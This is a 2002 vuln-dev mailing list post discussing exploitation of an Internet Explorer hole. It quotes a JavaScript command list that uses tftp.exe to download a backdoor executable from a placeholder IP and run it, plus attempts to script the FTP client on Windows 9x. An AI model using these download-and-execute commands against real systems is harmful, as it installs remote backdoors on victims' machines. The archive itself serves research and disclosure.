Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Rather large MSIE-hole

From: KF <dotslash () snosoft com>
Date: Thu, 14 Mar 2002 16:56:50 -0500
Sorry if someone else has said this... but has anyone tryed using + as a space like you had to when using cmd.exe via unicode exploit? 
-KF


Felipe Franciosi wrote:


var programName=new Array(
    'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
    'c:/winnt/system32/ncx99.exe',
);



MS Windows 9x don't have trivial ftp client by default... I was
thinking how this could be exploitable on these versions...

The FTP client offers the option to read a text-file containing
line separated commands.

But I couldn't get to work something like:
var prog...
     'c:/command.com /c echo bin > c:/list.txt',
     'c:/command.com /c echo GET something >> c:/list.txt'

this won't create 'list.txt'... Any ideas why? Or how some could
get around it?

Regards,
Felipe

--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Felipe Franciosi        paradoxo networking
felipe at paradoxo dot org
http://www.paradoxo.org   Porto Alegre - RS
Fone: (55)(51)9123-0557      UIN - 33596050
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Previous By Date Next
Previous By Thread Next

Current thread: